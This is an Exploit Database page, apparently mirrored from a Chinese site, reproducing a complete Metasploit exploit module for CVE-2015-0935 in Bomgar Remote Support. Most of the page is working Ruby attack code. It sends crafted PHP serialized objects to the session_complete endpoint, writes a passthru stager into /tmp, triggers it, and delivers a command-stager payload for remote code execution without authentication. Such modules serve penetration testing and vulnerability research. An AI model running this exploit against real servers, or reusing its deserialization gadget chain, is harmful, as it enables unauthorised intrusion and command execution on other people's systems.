Bomgar Remote Support – Code Execution (Metasploit)

• Exploit Database
• 14 阅读

• 作者： Markus Wulftange
  日期： 2016-06-15
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/39958/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  
  def initialize
  super(
  'Name' => 'Bomgar Remote Support Unauthenticated Code Execution',
  'Description'=> %q{
  This module exploits a vulnerability in the Bomgar Remote Support, which
  deserializes user provided data using PHP's `unserialize` method.
  By providing an specially crafted PHP serialized object, it is possible
  to write arbitrary data to arbitrary files. This effectively allows the
  execution of arbitrary PHP code in the context of the Bomgar Remote Support
  system user.
  
  To exploit the vulnerability, a valid Logging Session ID (LSID) is required.
  It consists of four key-value pairs (i. e., 'h=[...];l=[...];m=[...];t=[...]')
  and can be retrieved by an unauthenticated user at the end of the process
  of submitting a new issue via the 'Issue Submission' form.
  
  Versions before 15.1.1 are reported to be vulnerable.
  },
  'Author' =>
  [
  'Markus Wulftange',
  ],
  'License'=> MSF_LICENSE,
  'DisclosureDate' => 'May 5 2015',
  'References' =>
  [
  ['CWE', '94'],
  ['CWE', '502'],
  ['CVE', '2015-0935'],
  ['US-CERT-VU', '978652'],
  ['URL', 'http://codewhitesec.blogspot.com/2015/05/cve-2015-0935-bomgar-remote-support-portal.html'],
  ],
  'Privileged' => false,
  'Targets'=>
  [
  [ 'Linux x86',
  {
  'Platform'=> 'linux',
  'Arch'=> ARCH_X86,
  'CmdStagerFlavor' => [ :echo, :printf ]
  }
  ],
  [ 'Linux x86_64',
  {
  'Platform'=> 'linux',
  'Arch'=> ARCH_X86_64,
  'CmdStagerFlavor' => [ :echo, :printf ]
  }
  ]
  ],
  'DefaultTarget'=> 0,
  'DefaultOptions' =>
  {
  'RPORT'=> 443,
  'SSL'=> true,
  'TARGETURI'=> '/session_complete',
  },
  )
  
  register_options(
  [
  OptString.new('LSID', [true, 'Logging Session ID']),
  ], self.class
  )
  end
  
  def check
  version = detect_version
  
  if version
  print_status("Version #{version} detected")
  if version < '15.1.1'
  return Exploit::CheckCode::Appears
  else
  return Exploit::CheckCode::Safe
  end
  end
  
  print_status("Version could not be detected")
  return Exploit::CheckCode::Unknown
  end
  
  def exploit
  execute_cmdstager
  
  handler
  end
  
  def execute_command(cmd, opts)
  tmpfile = "/tmp/#{rand_text_alphanumeric(10)}.php"
  
  vprint_status("Uploading payload to #{tmpfile} ...")
  upload_php_file(tmpfile, generate_stager_php(cmd))
  
  vprint_status("Triggering payload in #{tmpfile} ...")
  execute_php_file(tmpfile)
  end
  
  def detect_version
  res = send_request_raw(
  'uri' => '/'
  )
  
  if res and res.code == 200 and res.body.to_s =~ /<!--Product Version: (\d+\.\d+\.\d+)-->/
  return $1
  end
  end
  
  def upload_php_file(filepath, data)
  send_pso(generate_upload_file_pso(filepath, data))
  end
  
  def execute_php_file(filepath)
  send_pso(generate_autoload_pso(filepath))
  end
  
  def send_pso(pso)
  res = send_request_cgi(
  'method'=> 'POST',
  'uri' => normalize_uri(target_uri.path),
  'vars_post' => {
  'lsid'=> datastore['LSID'],
  'survey'=> pso,
  }
  )
  
  if res
  if res.code != 200
  fail_with(Failure::UnexpectedReply, "Unexpected response from server: status code #{res.code}")
  end
  if res.body.to_s =~ />ERROR: ([^<>]+)</
  fail_with(Failure::Unknown, "Error occured: #{$1}")
  end
  else
  fail_with(Failure::Unreachable, "Error connecting to the remote server") unless successful
  end
  
  res
  end
  
  def generate_stager_php(cmd)
  "<?php unlink(__FILE__); passthru('#{cmd.gsub(/[\\']/, '\\\\\&')}');"
  end
  
  def generate_upload_file_pso(filepath, data)
  log_file = PHPObject.new(
  "Log_file",
  {
  "_filename" => filepath,
  "_lineFormat" => "",
  "_eol"=> data,
  "_append" => false,
  }
  )
  logger = PHPObject.new(
  "Logger",
  {
  "\0Logger\0_logs" => [ log_file ]
  }
  )
  tracer = PHPObject.new(
  "Tracer",
  {
  "\0Tracer\0_log" => logger
  }
  )
  
  serialize(tracer)
  end
  
  def generate_autoload_pso(filepath)
  object = PHPObject.new(
  filepath.chomp('.php').gsub('/', '_'),
  {}
  )
  
  serialize(object)
  end
  
  class PHPObject
  attr_reader :name, :members
  
  def initialize(name, members)
  @name = name
  @members = members
  end
  end
  
  def serialize(value)
  case value.class.name.split('::').last
  when 'Array' then serialize_array_numeric(value)
  when 'Fixnum' then serialize_integer(value)
  when 'Float' then serialize_double(value)
  when 'Hash' then serialize_array_assoc(value)
  when 'Nil' then serialize_nil
  when 'PHPObject' then serialize_object(value)
  when 'String' then serialize_string(value)
  when 'TrueClass', 'FalseClass' then serialize_boolean(value)
  else raise "Value of #{value.class} cannot be serialized"
  end
  end
  
  def serialize_array_numeric(a)
  "a:#{a.size}:{" + a.each_with_index.map { |v, i|
  serialize_integer(i) + serialize(v)
  }.join + "}"
  end
  
  def serialize_array_assoc(h)
  "a:#{h.size}:{" + h.each_pair.map { |k, v|
  serialize_string(k) + serialize(v)
  }.join + "}"
  end
  
  def serialize_boolean(b)
  "b:#{b ? '1' : '0'};"
  end
  
  def serialize_double(f)
  "d:#{f};"
  end
  
  def serialize_integer(i)
  "i:#{i};"
  end
  
  def serialize_null
  "N;"
  end
  
  def serialize_object(o)
  "O:#{serialize_string(o.name)[2..-2]}:#{serialize_array_assoc(o.members)[2..-1]}"
  end
  
  def serialize_string(s)
  "s:#{s.size}:\"#{s}\";"
  end
  
  end